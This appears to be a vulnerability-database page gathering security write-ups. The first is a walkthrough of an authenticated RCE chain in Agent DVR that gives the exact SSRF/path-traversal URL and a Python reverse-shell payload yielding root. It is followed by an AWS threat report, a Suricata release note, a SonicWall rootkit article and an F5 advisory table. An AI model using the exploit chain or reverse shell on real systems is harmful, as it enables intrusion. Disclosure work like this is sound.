-2023-53458

RCE in Agent DVR
2025-11-18T15:39:57 by Alexandre Dulaunoy

Description:

Ref: https://www.ericholub.com/blog/agent-dvr-rce/

Agent DVR is surveillance recording software from iSpyConnect. Versions ≤ 6.6.7.0 are vulnerable to local path traversal, SSRF, and command injection (on Linux), which when combined lead to authenticated RCE. These findings have all been combined into CVE-2025-63408.

Walkthrough:

Agent DVR has a local API where you can access things like recordings without any kind of authentication. Here’s the API docs for it:

[

Swagger UI

https://ispysoftware.github.io/Agent_API/#/

](https://ispysoftware.github.io/Agent_API/#/)

One call in particular is interesting, which is ‘addrecording’. This lets you assign a ‘recording’ to a particular camera.

Turns out this call is vulnerable to path traversal. I’ve already written some exploit code on how to get any file from the filesystem from this:

https://github.com/eric-m-holub/double-agent

This vulnerability can be chained with SSRF and command injection vulnerabilities for full RCE. I’m going to be attacking Agent DVR v6.6.1.0 running on Ubuntu (Linux). I tested these vulns on Windows against the same Agent DVR version and found it was vulnerable to everything but the command injection.

First off, add a new Network IP Camera.

Next select the gear icon to update the Source Type:

Now enter in the following payload for ‘Live URL’:

💲

http://127.0.0.1:8090/command/addrecording?oid=1&ot=2&path=/etc/passwd&name=../../../../Commands/rce.sh

Press ‘OK’ and then flip the camera on and off:

This leverages an SSRF vulnerability which calls this local API and creates a file called ‘rce.sh’ in the ‘Commands’ directory of Agent DVR using directory traversal. It doesn’t matter what the file contents are, only the file extension type.

Now create a new Action and Task for this camera:

Now on the popup to create a task select “Execute Command” and select the created ‘rce’ file:

For the ‘Parameters’ input, this is where you put your system command. Yes, this parameter is vulnerable to command injection, but only when you target a bash script. I had trouble with bash reverse shells, but Python works OK. Here’s that payload:

`python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'`

At this point, I’d suggest updating your new camera to something with an ‘Image’ source so we can make a new recording from it:

You can put any Image URL you want in there

So now start a listener on the port you specified in your payload, and then create a new recording on this new camera and you should get a root shell:

Tah dah. Agent DVR runs as root by default on Linux, so no privilege escalation is necessary. Have a good day.


Related vulnerabilities: CVE-2025-63408

Amazon discovers APT exploiting Cisco and Citrix zero-days | AWS Security Blog

AWS Security Blog

The Amazon threat intelligence team has identified an advanced threat actor exploiting previously undisclosed zero-day vulnerabilities in Cisco Identity Service Engine (ISE) and Citrix systems. The campaign used custom malware and demonstrated access to multiple undisclosed vulnerabilities. This discovery highlights the trend of threat actors focusing on critical identity and network access control infrastructure—the systems enterprises rely on to enforce security policies and manage authentication across their networks.

Initial discovery

Our Amazon MadPot honeypot service detected exploitation attempts for the Citrix Bleed Two vulnerability (CVE-2025-5777) prior to public disclosure, indicating a threat actor had been exploiting the vulnerability as a zero-day. Through further investigation of the same threat exploiting the Citrix vulnerability, Amazon Threat Intelligence identified and shared with Cisco an anomalous payload targeting a previously undocumented endpoint in Cisco ISE that used vulnerable deserialization logic. This vulnerability, now designated as CVE-2025-20337, allowed the threat actors to achieve pre-authentication remote code execution on Cisco ISE deployments, providing administrator-level access to compromised systems. What made this discovery particularly concerning was that exploitation was occurring in the wild before Cisco had assigned a CVE number or released comprehensive patches across all affected branches of Cisco ISE. This patch-gap exploitation technique is a hallmark of sophisticated threat actors who closely monitor security updates and quickly weaponize vulnerabilities.

Custom web shell deployment

Following successful exploitation, the threat actor deployed a custom web shell disguised as a legitimate Cisco ISE component named IdentityAuditAction. This wasn’t typical off-the-shelf malware, but rather a custom-built backdoor specifically designed for Cisco ISE environments. The web shell demonstrated advanced evasion capabilities. It operated completely in-memory, leaving minimal forensic artifacts, used Java reflection to inject itself into running threads, registered as a listener to monitor all HTTP requests across the Tomcat server, implemented DES encryption with non-standard Base64 encoding to evade detection, and required knowledge of specific HTTP headers to access.

The following is a snippet of the deserialization routine showing the actor’s extensive authentication to access their web shell:

Security implications

As previously noted, Amazon Threat Intelligence identified through our MadPot honeypots that the threat actor was exploiting both CVE-2025-20337 and CVE-2025-5777 as zero-days, and was indiscriminately targeting the internet with these vulnerabilities at the time of investigation. The campaign underscored the evolving tactics of threat actors targeting critical enterprise infrastructure at the network edge. The threat actor’s custom tooling demonstrated a deep understanding of enterprise Java applications, Tomcat internals, and the specific architectural nuances of the Cisco Identity Service Engine. The access to multiple unpublished zero-day exploits indicates a highly resourced threat actor with advanced vulnerability research capabilities or potential access to non-public vulnerability information.

Recommendations for security teams

For security teams, this serves as a reminder that critical infrastructure components like identity management systems and remote access gateways remain prime targets for threat actors. The pre-authentication nature of these exploits reveals that even well-configured and meticulously maintained systems can be affected. This underscores the importance of implementing comprehensive defense-in-depth strategies and developing robust detection capabilities that can identify unusual behavior patterns. Amazon recommends limiting access, through firewalls or layered access, to privileged security appliance endpoints such as management portals.

Vendor references

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.


Related vulnerabilities: CVE-2025-5777CVE-2025-20337CVE-2025-5349

Suricata 8.0.2 and 7.0.13 released! - Suricata

We are pleased to announce the releases of Suricata 8.0.2 and 7.0.13.

These are security releases, fixing a number of important issues.

Get the releases here:

8.0.2: https://www.openinfosecfoundation.org/download/suricata-8.0.2.tar.gz

7.0.13: https://www.openinfosecfoundation.org/download/suricata-7.0.13.tar.gz

Notable Changes

Suricata-update has been updated to version 1.3.7. This version is bundled with the releases.

Various security, performance, accuracy, and stability issues have been fixed.

8.0.2 tickets: https://redmine.openinfosecfoundation.org/versions/225

7.0.13 tickets: https://redmine.openinfosecfoundation.org/versions/224

CVE IDs Addressed:

  • CVE-2025-64344: HIGH (7.0.x and 8.0.x)
  • CVE-2025-64333: HIGH (7.0.x and 8.0.x)
  • CVE-2025-64332: HIGH (7.0.x and 8.0.x)
  • CVE-2025-64331: HIGH (7.0.x and 8.0.x)
  • CVE-2025-64330: HIGH (7.0.x and 8.0.x)
  • CVE-2025-64335: HIGH (8.0.x only)
  • CVE-2025-64334: HIGH (8.0.x only)

Suricata Security Advisories: https://github.com/OISF/suricata/security/advisories

OISF Signing key updated

The OISF signing key has been recently updated to have a later expiration date. It is the same key as before, but users will need to refresh it:

gpg --receive-keys 2BA9C98CCDF1E93A

It can also be downloaded from:

https://www.openinfosecfoundation.org/downloads/OISF.pub

Special Thanks

Adam Kiripolsky, Alain Térieur, Amir Boussejra, Andreas Dolp, Andy Awad, Bai Liang, Cheng Longfei, Fupeng Zhao, Heng Li, Jamie Lavigne, Jesse Lepich, Jules Lumbergh, Marko Jahnke, Outreachy, OSS-Fuzz, Coverity.

Join us for SuriCon 2025!!

This year’s Suricata Community Conference is happening this month in Montreal, Canada, from November 19 to 21.

SuriCon is a great place to present exciting work or research done with Suricata. Come share it with us! Check the agenda, we always have great talks :smiley: https://suricon.net/agenda-montreal/

This year, we have three 2-day training sessions to choose from, including a brand-new Threat Hunting class, and a Rule Writing training. Some rooms are getting full, don’t miss your spot! https://suricon.net/trainings/

Check everything SuriCon and get book room deals at https://suricon.net/ .

About Suricata

Suricata is a high-performance Network Threat Detection, IDS, IPS, and Network Security Monitoring engine. Open-source and owned by a community-run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by OISF, its supporting vendors, and the community.

———————————————

Originally posted by Victor Julien to the Suricata forum: https://forum.suricata.io/t/suricata-8-0-2-and-7-0-13-released


Related vulnerabilities: CVE-2025-64333CVE-2025-64344CVE-2025-64331CVE-2025-64332CVE-2025-64334CVE-2025-64330CVE-2025-64335

UNC6148 Backdoors Fully-Patched SonicWall SMA 100 Series Devices with OVERSTEP Rootkit

Hacking SonicWall SMA 100 Series Devices

A threat activity cluster has been observed targeting fully-patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances as part of a campaign designed to drop a backdoor called OVERSTEP.

The malicious activity, dating back to at least October 2024, has been attributed by the Google Threat Intelligence Group (GTIG) to a hacking crew it tracks as UNC6148. The number of known victims is "limited" at this stage.

The tech giant assessed with high confidence that the threat actor is "leveraging credentials and one-time password (OTP) seeds stolen during previous intrusions, allowing them to regain access even after organizations have applied security updates."

"Analysis of network traffic metadata records suggests that UNC6148 may have initially exfiltrated these credentials from the SMA appliance as early as January 2025."

The exact initial access vector used to deliver the malware is currently not known due to the steps taken by the threat actors to remove log entries. But it's believed that access may have been gained through the exploitation of known security flaws such as CVE-2021-20035, CVE-2021-20038, CVE-2021-20039, CVE-2024-38475, or CVE-2025-32819.

Alternately, the tech giant's threat intelligence team theorized that the administrator credentials could've been obtained through information-stealing logs or acquired from credential marketplaces. However, it said it didn't find any evidence to back up this hypothesis.

DFIR Retainer Services

Upon gaining access, the threat actors have been found to establish an SSL-VPN session and spawn a reverse shell, although how this was achieved remains a mystery given that shell access should not be possible by design on these appliances. It's believed that it may have been pulled off by means of a zero-day flaw.

The reverse shell is used to run reconnaissance and file manipulation commands, not to mention export and import settings to the SMA appliance, suggesting that UNC6148 may have altered an exported settings file offline to include new rules so that their operations are not interrupted or blocked by the access gateways.

The attacks culminate in the deployment of a previously undocumented implant named OVERSTEP that's capable of modifying the appliance's boot process to maintain persistent access, as well as credential theft and concealing its own components to evade detection by patching various file system-related functions.

This is achieved by implementing a usermode rootkit through the hijacked standard library functions open and readdir, allowing it to hide the artifacts associated with the attack. The malware also hooks into the write API function to receive commands from an attacker-controlled server in the form of embedded within web requests -

  • dobackshell, which starts a reverse shell to the specified IP address and port
  • dopasswords, which creates a TAR archive of the files /tmp/temp.db, /etc/EasyAccess/var/conf/persist.db, and /etc/EasyAccess/var/cert, and save it in the location "/usr/src/EasyAccess/www/htdocs/" so that it can be downloaded via a web browser

"UNC6148 modified the legitimate RC file '/etc/rc.d/rc.fwboot' to achieve persistence for OVERSTEP," GTIG said. "The changes meant that whenever the appliance was rebooted, the OVERSTEP binary would be loaded into the running file system on the appliance."

Once the deployment step is complete, the threat actor then proceeds to clear the system logs and reboots the firewall to activate the execution of the C-based backdoor. The malware also attempts to remove the command execution traces from different log files, including httpd.log, http_request.log, and inotify.log.

"The actor's success in hiding their tracks is largely due to OVERSTEP's capability to selectively delete log entries [from the three log files]," Google said. "This anti-forensic measure, combined with a lack of shell history on disk, significantly reduces visibility into the actor's secondary objectives."

Google has evaluated with medium confidence that UNC6148 may have weaponized an unknown, zero-day remote code execution vulnerability to deploy OVERSTEP on targeted SonicWall SMA appliances. Furthermore, it's suspected that the operations are carried out with the intent to facilitate data theft and extortion operations, and even ransomware deployment.

CIS Build Kits

This connection stems from the fact that one of the organizations that was targeted by UNC6148 was posted on the data leak site operated by World Leaks, an extortion gang run by individuals previously associated with the Hunters International ransomware scheme. It's worth noting that Hunters International recently shuttered its criminal enterprise.

According to Google, UNC6148 exhibits tactical overlaps with prior exploitation of SonicWall SMA devices observed in July 2023 that involved an unknown threat actor deploying a web shell, a hiding mechanism, and a way to ensure persistence across firmware upgrades, per Truesec.

The exploitation activity was subsequently linked by security researcher Stephan Berger to the deployment of the Abyss ransomware.

The findings once again highlight how threat actors are increasingly focusing on edge network systems that aren't usually covered by common security tools like Endpoint Detection and Response (EDR) or antivirus software and slip into target networks unnoticed.

"Organizations should acquire disk images for forensic analysis to avoid interference from the rootkit anti-forensic capabilities. Organizations may need to engage with SonicWall to capture disk images from physical appliances," Google said.

When reached for comment on the findings, SonicWall told The Hacker News that it has been "working closely" with GTIG throughout the whole process, and that it plans to accelerate the end-of-support date for the SMA 100 series. It also said it intends to support existing SMA 100 deployments with firmware updates throughout the remaining lifecycle.

"In response to the evolving threat landscape – and in alignment with our commitment to transparency and customer protection – SonicWall will accelerate the end-of-support date for the SMA 100 series," the company said. "The SMA 100 has already reached end-of-sale status, as reflected in our Product Lifecycle Table, and this update aligns with our long-term strategy and industry direction."

"SonicWall has been actively guiding customers toward more modern, secure solutions such as our Cloud Secure Edge service and the SMA 1000 series. These platforms are built on advanced technology stacks and offer stronger security, greater scalability, and an improved user experience – better suited for today's distributed and cloud-connected environments. This mirrors broader industry trends, where leading vendors like Cisco and Palo Alto Networks have moved customers from legacy hardware to cloud-native architectures."

(The story was updated after publication to include a response from SonicWall.)

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


Related vulnerabilities: CVE-2021-20038CVE-2021-20035CVE-2024-38475CVE-2021-20039CVE-2025-32819

Article (CVE) CVSS score<sup>1</sup> Affected products Affected versions<sup>2</sup> Fixes introduced in
K000151902: BIG-IP SCP and SFTP vulnerability CVE-2025-53868 8.7 (CVSS v3.1)
8.5 (CVSS v4.0)
BIG-IP (all modules) 17.5.0
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1
17.1.3
16.1.6.1
15.1.10.8
K000156767: F5OS vulnerability CVE-2025-61955 7.8 (standard mode) (CVSS v3.1)
8.8 (appliance mode) (CVSS v3.1)
8.5 (standard and appliance mode) (CVSS v4.0)
F5OS-A 1.8.0<sup>3</sup>
1.5.1 - 1.5.3
1.8.3
1.5.4
F5OS-C 1.8.0 - 1.8.1
1.6.0 - 1.6.2<sup>3</sup>
1.8.2
1.6.4
K000156771: F5OS vulnerability CVE-2025-57780 7.8 (standard mode) (CVSS v3.1)
8.8 (appliance mode) (CVSS v3.1)
8.5 (standard and appliance mode) (CVSS v4.0)
F5OS-A 1.8.0<sup>3</sup>
1.5.1 - 1.5.3
1.8.3
1.5.4
F5OS-C 1.8.0 - 1.8.1
1.6.0 - 1.6.2<sup>3</sup>
1.8.2
1.6.4
K000139514: BIG-IP SSL/TLS vulnerability CVE-2025-60016 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.1.0 - 17.1.1 17.1.2
BIG-IP Next SPK 1.7.0 - 1.9.2 2.0.0
BIG-IP Next CNF 1.1.0 - 1.3.3 2.0.0
1.4.0
K000150614: BIG-IP MPTCP vulnerability CVE-2025-48008 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.1.0 - 17.1.2
16.1.0 - 16.1.5
15.1.0 - 15.1.10
17.1.2.2
16.1.6
15.1.10.8
BIG-IP Next SPK 1.7.0 - 1.9.2 None
BIG-IP Next CNF 1.1.0 - 1.4.1 None
K000150637: BIG-IP DNS cache vulnerability CVE-2025-59781 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.1.0 - 17.1.2
16.1.0 - 16.1.5
15.1.0 - 15.1.10
17.1.2.2
16.1.6
15.1.10.8
BIG-IP Next CNF 1.1.0 - 1.4.0 1.4.0 EHF-3<sup>4</sup>
K000150667: BIG-IP SSL Orchestrator vulnerability CVE-2025-41430 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP SSL Orchestrator 17.5.0
17.1.0 - 17.1.2
16.1.0 - 16.1.3
15.1.0 - 15.1.9
17.5.1
17.1.3
16.1.4
K000150752: BIG-IP HTTP/2 vulnerability CVE-2025-55669 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP ASM 17.1.0 - 17.1.2
16.1.0 - 16.1.5
17.1.2.2
16.1.5
K000151309: BIG-IP DTLS 1.2 vulnerability CVE-2025-61951 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.5.0
17.1.0 - 17.1.2
16.1.0 - 16.1.6
17.5.1
17.1.3
16.1.6.1
K000151368: BIG-IP SSL Orchestrator vulnerability CVE-2025-55036 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP SSL Orchestrator 17.1.0 - 17.1.2
16.1.0 - 16.1.5
15.1.0 - 15.1.10
17.1.3
16.1.6
15.1.10.8
K000151475: BIG-IP PEM vulnerability CVE-2025-54479 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP PEM 17.5.0
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1
17.1.3
16.1.6.1
15.1.10.8
BIG-IP Next CNF 2.0.0 - 2.1.0
1.1.0 - 1.4.0
2.1.0 EHF-1<sup>4</sup>
2.0.2 EHF-2<sup>4</sup>
2.0.0 EHF-2<sup>4</sup>
1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes 2.0.0 - 2.1.0 2.1.0 EHF-2<sup>4</sup>
K000151611: BIG-IP iRules vulnerability CVE-2025-46706 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.1.0 - 17.1.2
16.1.0 - 16.1.5
17.1.2.2
16.1.6
BIG-IP Next SPK 1.7.0 - 1.9.2 2.0.0
1.7.14 EHF-2<sup>4</sup>
BIG-IP Next CNF 1.1.0 - 1.4.1 2.0.0
1.4.0 EHF-3<sup>4</sup>
K000152341: BIG-IP AFM DoS protection profile vulnerability CVE-2025-59478 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP AFM 17.5.0
17.1.0 - 17.1.2
15.1.0 - 15.1.10
17.5.1
17.1.3
15.1.10.8
K000156624: BIG-IP Advanced WAF and ASM bd process vulnerability CVE-2025-61938 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP Advanced WAF/ASM 17.5.0
17.1.0 - 17.1.2
17.5.1
17.1.3
K000156621: BIG-IP Advanced WAF and ASM vulnerability CVE-2025-54858 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP Advanced WAF/ASM 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
K000156623: BIG-IP Next (CNF, SPK, and Kubernetes) vulnerability CVE-2025-58120 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP Next SPK 2.0.0
1.7.0 - 1.7.14
2.0.1
1.7.14 EHF-2<sup>4</sup>
BIG-IP Next CNF 2.0.0
1.1.0 - 1.4.1
2.0.1
BIG-IP Next for Kubernetes 2.0.0 2.1.0
K000156707: BIG-IP TMM vulnerability CVE-2025-53856 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
K000156733: BIG-IP SSL/TLS vulnerability CVE-2025-61974 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
BIG-IP Next SPK 2.0.0 - 2.0.2
1.7.0 - 1.9.2
2.1.0 EHF-1<sup>4</sup>
2.0.2 EHF-2<sup>4</sup>
2.0.0 EHF-2<sup>4</sup>
1.7.14 EHF-2<sup>4</sup>
BIG-IP Next CNF 2.0.0 - 2.1.0
1.1.0 - 1.4.1
2.1.0 EHF-1<sup>4</sup>
2.0.2 EHF-2<sup>4</sup>
2.0.0 EHF-2<sup>4</sup>
1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes 2.0.0 - 2.1.0 2.1.0 EHF-1<sup>4</sup>
3.7 (CVSS v3.1)
6.3 (CVSS v4.0)
F5 Silverline (all services) Not applicable Not applicable
K000156746: BIG-IP IPsec vulnerability CVE-2025-58071 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.5.0
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1
17.1.3
16.1.6.1
15.1.10.8
BIG-IP Next CNF 2.0.0 - 2.1.0
1.1.0 - 1.4.1
2.1.0 EHF-1<sup>4</sup>
2.0.2 EHF-2<sup>4</sup>
2.0.0 EHF-2<sup>4</sup>
1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes 2.0.0 - 2.1.0 2.1.0 EHF-1<sup>4</sup>
K000156741: BIG-IP APM vulnerability CVE-2025-53521 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP APM 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
K000156597: BIG-IP APM portal access vulnerability CVE-2025-61960 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP APM 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
17.5.1.3
17.1.3
16.1.6.1
K000156602: BIG-IP APM vulnerability CVE-2025-54854 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP APM 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
K44517780: BIG-IP iRules vulnerability CVE-2025-53474 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP APM 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
K000156912: BIG-IP TMM vulnerability CVE-2025-61990 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
BIG-IP Next SPK 2.0.0 - 2.0.2
1.7.0 - 1.9.2
2.1.0 EHF-1<sup>4</sup>
2.0.2 EHF-2<sup>4</sup>
2.0.0 EHF-2<sup>4</sup>1.7.15 EHF-2<sup>4</sup>
BIG-IP Next CNF 2.0.0 - 2.1.0
1.1.0 - 1.4.1
2.1.0 EHF-1<sup>4</sup>
2.0.2 EHF-2<sup>4</sup>
2.0.0 EHF-2<sup>4</sup>1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes 2.0.0 - 2.1.0 2.1.0 EHF-1<sup>4</sup>
K000156691: BIG-IP TMM vulnerability CVE-2025-58096 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP (all modules) 17.5.0 - 17.5.1
17.1.0 - 17.1.2
16.1.0 - 16.1.6
15.1.0 - 15.1.10
17.5.1.3
17.1.3
16.1.6.1
15.1.10.8
K000154664: BIG-IP Advanced WAF and ASM vulnerability CVE-2025-61935 7.5 (CVSS v3.1)
8.7 (CVSS v4.0)
BIG-IP Advanced WAF/ASM 17.5.0
17.1.0 - 17.1.2
15.1.0 - 15.1.10
17.5.1
17.1.3
15.1.10.8
K000151718: VELOS partition container network vulnerability CVE-2025-59778 7.5 (CVSS v3.1)
7.7 (CVSS v4.0)
F5OS-C 1.8.0 - 1.8.1
1.6.0 - 1.6.2<sup>3</sup>
1.8.2
1.6.4


Related vulnerabilities: CVE-2025-54479CVE-2025-55669CVE-2025-60016CVE-2025-59478CVE-2025-61951CVE-2025-61960CVE-2025-53521CVE-2025-61974CVE-2025-41430CVE-2025-61938CVE-2025-61955CVE-2025-57780CVE-2025-48008CVE-2025-53474CVE-2025-53868CVE-2025-59781CVE-2025-54858CVE-2025-53856CVE-2025-59778CVE-2025-58096CVE-2025-58071CVE-2025-54854CVE-2025-61935CVE-2025-55036CVE-2025-58120CVE-2025-46706CVE-2025-61990

displaying 1 - 10 bundles in total 102